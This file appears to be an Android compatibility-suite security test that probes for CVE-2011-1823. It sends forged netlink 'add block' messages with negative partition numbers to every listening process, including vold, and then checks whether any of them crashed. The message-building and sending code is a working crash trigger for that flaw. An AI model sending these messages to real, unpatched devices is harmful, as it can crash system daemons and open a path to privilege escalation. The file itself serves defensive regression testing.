/*
 * Copyright (C) 2011 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package android.security.cts;

import android.net.cts.NetlinkSocket;
import junit.framework.TestCase;

import java.io.File;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Scanner;
import java.util.Set;

public class VoldExploitTest extends TestCase {

    /**
     * Upper bound on how long {@link #confirmNetlinkMsgReceived()} waits for
     * every netlink receive queue listed in /proc/net/netlink to drain.
     * Without a bound, a single socket that never reads would hang the test.
     */
    private static final long NETLINK_DRAIN_TIMEOUT_MS = 30 * 1000;

    /** Delay between successive polls of /proc/net/netlink. */
    private static final long NETLINK_POLL_INTERVAL_MS = 50;

    /**
     * Try to crash the vold program.
     *
     * This test attempts to send invalid netlink messages to
     * any process which is listening for the messages.  If we detect
     * that any process crashed as a result of our message, then
     * we know that we found a bug.
     *
     * If this test fails, it's due to CVE-2011-1823
     *
     * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1823
     */
    public void testTryToCrashVold() throws IOException {
        Set<Integer> pids = getPids();
        assertTrue(pids.size() > 1);  // at least vold and netd should exist

        Set<String> devices = new HashSet<String>();
        devices.addAll(getSysFsPath("/etc/vold.fstab"));
        devices.addAll(getSysFsPath("/system/etc/vold.fstab"));
        if (devices.isEmpty()) {
            // This vulnerability is not exploitable if there's
            // no entry in vold.fstab
            return;
        }

        // NOTE(review): ns is never released; close it here if NetlinkSocket
        // exposes a close/cleanup method.
        NetlinkSocket ns = NetlinkSocket.create();
        for (int pid : pids) {
            for (String device : devices) {
                doAttack(ns, pid, device);
            }
        }

        // Check to see if all the processes are still alive.  If
        // any of them have died, we found an exploitable bug.
        for (int pid : pids) {
            assertTrue(
                    "PID=" + pid + " crashed due to a malformed netlink message."
                    + " Detected unpatched vulnerability CVE-2011-1823.",
                    isProcessAlive(pid));
        }
    }

    /**
     * Try to actually crash the program, by first sending a fake
     * request to add a new disk, followed by fake requests to add
     * partitions with negative partition numbers (-1000 .. -4000).
     *
     * @param ns   socket used to send the messages
     * @param pid  netlink port id of the receiving process
     * @param path DEVPATH value to put in the fake messages
     */
    private static void doAttack(NetlinkSocket ns, int pid, String path)
            throws IOException {
        try {
            ns.sendmsg(pid, getDiskAddedMessage(path));
            confirmNetlinkMsgReceived();

            for (int partitionNum = -1000; partitionNum > -5000;
                    partitionNum -= 1000) {
                ns.sendmsg(pid, getPartitionAddedMessage(path, partitionNum));
                confirmNetlinkMsgReceived();
            }
        } catch (IOException e) {
            // Ignore the exception.  The process either:
            //
            // 1) Crashed
            // 2) Closed the netlink socket and refused further messages
            //
            // If #1 occurs, our PID check in testTryToCrashVold() will
            // detect the process crashed and trigger an error.
            //
            // #2 is not a security bug.  It's perfectly acceptable to
            // refuse messages from someone trying to send you
            // malicious content.
        }
    }

    /**
     * Parse a vold.fstab file and extract the "sysfs_path" fields of every
     * "dev_mount" line (the fifth column and everything after it).
     *
     * @param file path of the fstab file to read
     * @return the sysfs paths found, or an empty set if the file is unreadable
     */
    private static Set<String> getSysFsPath(String file) throws IOException {
        Set<String> retval = new HashSet<String>();
        File fstab = new File(file);
        if (!fstab.canRead()) {
            return retval;
        }
        Scanner scanner = null;
        try {
            scanner = new Scanner(fstab);
            while (scanner.hasNextLine()) {
                String line = scanner.nextLine().trim();
                if (!line.startsWith("dev_mount")) {
                    continue;
                }

                String[] fields = line.split("\\s+");
                assertTrue("Malformed dev_mount line in " + file + ": " + line,
                        fields.length >= 5);
                // Column 5 and beyond is "sysfs_path"
                retval.addAll(Arrays.asList(fields).subList(4, fields.length));
            }
        } finally {
            if (scanner != null) {
                scanner.close();
            }
        }
        return retval;
    }

    /**
     * Poll /proc/net/netlink until all the "Rmem" fields contain
     * "0".  This indicates that there are no outstanding unreceived
     * netlink messages.
     *
     * Fails the test if the queues do not drain within
     * {@link #NETLINK_DRAIN_TIMEOUT_MS}, instead of spinning forever.
     */
    private static void confirmNetlinkMsgReceived() {
        long deadline = System.nanoTime()
                + NETLINK_DRAIN_TIMEOUT_MS * 1000L * 1000L;
        try {
            while (!allNetlinkQueuesEmpty()) {
                // Subtraction form is overflow-safe for nanoTime comparisons.
                if (System.nanoTime() - deadline > 0) {
                    fail("Netlink messages were not received within "
                            + NETLINK_DRAIN_TIMEOUT_MS + " ms");
                }
                Thread.sleep(NETLINK_POLL_INTERVAL_MS);
            }
        } catch (InterruptedException e) {
            // Restore the interrupt flag so callers can still observe it.
            Thread.currentThread().interrupt();
            throw new RuntimeException(e);
        }
    }

    /**
     * Returns true if every socket listed in /proc/net/netlink reports an
     * "Rmem" value of "0".
     */
    private static boolean allNetlinkQueuesEmpty() {
        for (List<String> row : parseNetlink()) {
            // Column 5 is the "Rmem" field, which is the
            // amount of kernel memory for received netlink messages.
            if (!row.get(4).equals("0")) {
                return false;
            }
        }
        return true;
    }

    /**
     * Extract all the PIDs listening for netlink messages whose process is
     * still alive.
     */
    private static Set<Integer> getPids() {
        Set<Integer> retval = new HashSet<Integer>();
        for (List<String> row : parseNetlink()) {
            // The PID is in column 3.  It is a plain decimal number; parse it
            // as a long so values outside the int range do not throw.
            // Non-positive or out-of-range ids have no /proc entry, so they
            // are skipped (the original /proc check rejected them as well).
            long pid = Long.parseLong(row.get(2));
            if (pid <= 0 || pid > Integer.MAX_VALUE) {
                continue;
            }
            if (isProcessAlive((int) pid)) {
                retval.add((int) pid);
            }
        }
        return retval;
    }

    /** Returns true if /proc/&lt;pid&gt;/cmdline exists. */
    private static boolean isProcessAlive(int pid) {
        return new File("/proc/" + pid + "/cmdline").exists();
    }

    /**
     * Parse /proc/net/netlink and return one whitespace-split List per
     * socket line (the header line starting with "sk" and blank lines are
     * excluded).
     */
    private static List<List<String>> parseNetlink() {
        List<List<String>> retval = new ArrayList<List<String>>();
        File netlink = new File("/proc/net/netlink");
        Scanner scanner = null;
        try {
            scanner = new Scanner(netlink);
            while (scanner.hasNextLine()) {
                String line = scanner.nextLine().trim();
                // A blank line would yield a one-element row and break the
                // column lookups performed by callers.
                if (line.isEmpty() || line.startsWith("sk")) {
                    continue;
                }

                List<String> lineList = Arrays.asList(line.split("\\s+"));
                retval.add(lineList);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        } finally {
            if (scanner != null) {
                scanner.close();
            }
        }
        return retval;
    }

    /**
     * Build a fake NUL-separated "add block disk" message for {@code path}.
     */
    private static byte[] getDiskAddedMessage(String path) {
        return toAscii("@/foo\0ACTION=add\0SUBSYSTEM=block\0"
                + "DEVPATH=" + path + "\0MAJOR=179\0MINOR=12345"
                + "\0DEVTYPE=disk\0");
    }

    /**
     * Build a fake NUL-separated "add block partition" message for
     * {@code path} carrying the given PARTN value (callers pass negative
     * numbers, presumably to hit the CVE-2011-1823 index bug in vold).
     */
    private static byte[] getPartitionAddedMessage(
            String path, int partitionNum) {
        return toAscii("@/foo\0ACTION=add\0SUBSYSTEM=block\0"
                + "DEVPATH=" + path + "\0MAJOR=179\0MINOR=12345"
                + "\0DEVTYPE=blah\0PARTN=" + partitionNum + "\0");
    }

    /** Encode {@code s} as ASCII bytes. */
    private static byte[] toAscii(String s) {
        try {
            return s.getBytes("ASCII");
        } catch (UnsupportedEncodingException e) {
            throw new RuntimeException(e);
        }
    }
}
